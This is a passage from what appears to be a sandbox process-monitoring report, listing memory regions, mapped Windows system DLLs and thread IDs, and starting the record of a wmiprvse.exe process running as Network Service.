monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 2546 start_va = 0x1bc0000 end_va = 0x1c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 2547 start_va = 0x1c70000 end_va = 0x1ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 2548 start_va = 0x1cf0000 end_va = 0x20f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cf0000" filename = "" Region: id = 2549 start_va = 0x2100000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 2550 start_va = 0x2520000 end_va = 0x259ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 2551 start_va = 0x25b0000 end_va = 0x262ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 2552 start_va = 0x2640000 end_va = 0x26bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002640000" filename = "" Region: id = 2553 start_va = 0x2710000 end_va = 0x278ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 2554 start_va = 0x2800000 end_va = 0x287ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 2555 start_va = 0x2880000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 2556 start_va = 0x2900000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2557 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 2558 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2559 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2560 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2561 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2562 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2563 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2564 start_va = 0xff030000 end_va = 0xff082fff monitored = 0 entry_point = 0xff043310 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 2565 start_va = 0xff300000 end_va = 0xff30afff monitored = 0 entry_point = 0xff30246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2566 start_va = 0xff430000 end_va = 0xff491fff monitored = 0 entry_point = 0xff4408d8 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 2567 start_va = 0x7fef04c0000 end_va = 0x7fef05e4fff monitored = 0 entry_point = 0x7fef0511570 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 2568 start_va = 0x7fef0660000 end_va = 0x7fef067bfff monitored = 0 entry_point = 0x7fef0661060 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 2569 start_va = 0x7fef0d40000 end_va = 0x7fef0dedfff monitored = 0 entry_point = 0x7fef0d44104 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 2570 start_va = 0x7fef50a0000 end_va = 0x7fef50b2fff monitored = 0 entry_point = 0x7fef50a1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2571 start_va = 0x7fef5310000 end_va = 0x7fef531dfff monitored = 0 entry_point = 0x7fef5315500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2572 start_va = 0x7fef5320000 end_va = 0x7fef5346fff monitored = 0 entry_point = 0x7fef53211a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 2573 start_va = 0x7fef5350000 end_va = 0x7fef5422fff monitored = 0 entry_point = 0x7fef53c8b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2574 start_va = 0x7fef56c0000 end_va = 0x7fef5736fff monitored = 0 entry_point = 0x7fef56fe7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 2575 start_va = 0x7fef7f60000 end_va = 0x7fef7f7afff monitored = 0 entry_point = 0x7fef7f61198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 2576 start_va = 0x7fef85d0000 end_va = 0x7fef861efff monitored = 0 entry_point = 0x7fef85d2760 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 2577 start_va = 0x7fef9100000 end_va = 0x7fef9117fff monitored = 0 entry_point = 0x7fef9101bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2578 start_va = 0x7fef9120000 end_va = 0x7fef9130fff monitored = 0 entry_point = 0x7fef91216ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2579 start_va = 0x7fef91e0000 end_va = 0x7fef921afff monitored = 0 entry_point = 0x7fef91e4520 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 2580 start_va = 0x7fef9220000 end_va = 0x7fef9270fff monitored = 0 entry_point = 0x7fef922f6c0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 2581 start_va = 0x7fef9290000 end_va = 0x7fef9297fff monitored = 0 entry_point = 0x7fef929284c region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 2582 start_va = 0x7fef92a0000 end_va = 0x7fef92a9fff monitored = 0 entry_point = 0x7fef92a1adc region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 2583 start_va = 0x7fefb230000 end_va = 0x7fefb23afff monitored = 0 entry_point = 0x7fefb231198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2584 start_va = 0x7fefb240000 end_va = 0x7fefb266fff monitored = 0 entry_point = 0x7fefb2498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2585 start_va = 0x7fefb6e0000 end_va = 0x7fefb6e8fff monitored = 0 entry_point = 0x7fefb6e1010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 2586 start_va = 0x7fefb6f0000 end_va = 0x7fefb71bfff monitored = 0 entry_point = 0x7fefb6f15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2587 start_va = 0x7fefb720000 end_va = 0x7fefb7cbfff monitored = 0 entry_point = 0x7fefb736acc region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 2588 start_va = 0x7fefb940000 end_va = 0x7fefb954fff monitored = 0 entry_point = 0x7fefb941050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2589 start_va = 0x7fefb960000 end_va = 0x7fefb96bfff monitored = 0 entry_point = 0x7fefb9618a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2590 start_va = 0x7fefbc60000 end_va = 0x7fefbcaafff monitored = 0 entry_point = 0x7fefbc6efcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 2591 start_va = 0x7fefc0d0000 end_va = 0x7fefc1fbfff monitored = 0 entry_point = 0x7fefc0d94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2592 start_va = 0x7fefc740000 end_va = 0x7fefc76cfff monitored = 0 entry_point = 0x7fefc741010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2593 start_va = 0x7fefc770000 end_va = 0x7fefc905fff monitored = 0 entry_point = 0x7fefc7778e4 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 2594 start_va = 0x7fefc910000 end_va = 0x7fefc91bfff monitored = 0 entry_point = 0x7fefc911064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2595 start_va = 0x7fefc920000 end_va = 0x7fefc9dafff monitored = 0 entry_point = 0x7fefc926de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2596 start_va = 0x7fefc9e0000 end_va = 0x7fefc9e6fff monitored = 0 entry_point = 0x7fefc9e14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 2597 start_va = 0x7fefcad0000 end_va = 0x7fefcaeafff monitored = 0 entry_point = 0x7fefcad2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2598 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2599 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 2600 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2601 start_va = 0x7fefce60000 end_va = 0x7fefcebafff monitored = 0 entry_point = 0x7fefce66940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2602 start_va = 0x7fefcfd0000 end_va = 0x7fefcfd6fff monitored = 0 entry_point = 0x7fefcfd142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 2603 start_va = 0x7fefcfe0000 end_va = 0x7fefd034fff monitored = 0 entry_point = 0x7fefcfe1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2604 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2605 start_va = 0x7fefd190000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd195d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2606 start_va = 0x7fefd250000 end_va = 0x7fefd2bcfff monitored = 0 entry_point = 0x7fefd251010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2607 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2608 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2609 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2610 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2611 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2612 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2613 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2614 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2615 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2616 start_va = 0x7fefd9e0000 end_va = 0x7fefda1afff monitored = 0 entry_point = 0x7fefd9e1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2617 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2618 start_va = 0x7fefda60000 end_va = 0x7fefda79fff monitored = 0 entry_point = 0x7fefda61558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2619 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2620 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2621 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2622 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2623 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2624 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2625 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2626 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2627 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2628 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2629 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2630 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2631 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2632 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2633 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2634 start_va = 0x7feff680000 end_va = 0x7feff856fff monitored = 0 entry_point = 0x7feff681010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2635 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2636 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2637 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 2638 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 2639 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 2640 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 2641 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 2642 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 2643 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 2644 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 2645 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 2646 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 2647 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 2648 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 2649 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 2650 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 2651 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 2652 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2653 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2654 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2655 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2656 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2657 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2658 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2659 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2660 start_va = 0x7fef2250000 end_va = 0x7fef23cffff monitored = 0 entry_point = 0x7fef22880d0 region_type = mapped_file name = "racengn.dll" filename = "\\Windows\\System32\\RacEngn.dll" (normalized: "c:\\windows\\system32\\racengn.dll") Thread: id = 98 os_tid = 0xef4 Thread: id = 99 os_tid = 0xd94 Thread: id = 100 os_tid = 0xd90 Thread: id = 101 os_tid = 0x7d8 Thread: id = 102 os_tid = 0x218 Thread: id = 103 os_tid = 0x524 Thread: id = 104 os_tid = 0x7ac Thread: id = 105 os_tid = 0x788 Thread: id = 106 os_tid = 0x794 Thread: id = 107 os_tid = 0x5fc Thread: id = 108 os_tid = 0x5f4 Thread: id = 109 os_tid = 0x5ec Thread: id = 110 os_tid = 0x558 Thread: id = 111 os_tid = 0x460 Thread: id = 112 os_tid = 0x448 Thread: id = 113 os_tid = 0x3b0 Thread: id = 114 os_tid = 0x3a8 Thread: id = 115 os_tid = 0x398 Thread: id = 116 os_tid = 0x2f8 Thread: id = 117 os_tid = 0x2f4 Thread: id = 118 os_tid = 0x2d8 Thread: id = 119 os_tid = 0x2d0 Thread: id = 120 os_tid = 0x2c4 Thread: id = 121 os_tid = 0xf40 Thread: id = 126 os_tid = 0xf58 Thread: id = 168 os_tid = 0xff4 Process: id = "10" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x4db8a000" os_pid = "0xc5c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x248" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00047dda" [0xc000000f] Region: id = 2755 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2756 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2757 start_va = 0x30000 end_va = 0xaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2758 start_va = 0xb0000 end_va = 0xb3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 2759 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 2760 start_va = 0xd0000 end_va = 0x136fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2761 start_va = 0x140000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 2762 start_va = 0x240000 end_va = 0x240fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 2763 start_va = 0x250000 end_va = 0x254fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2764 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 2765 start_va = 0x270000 end_va = 0x270fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 2766 start_va = 0x280000 end_va = 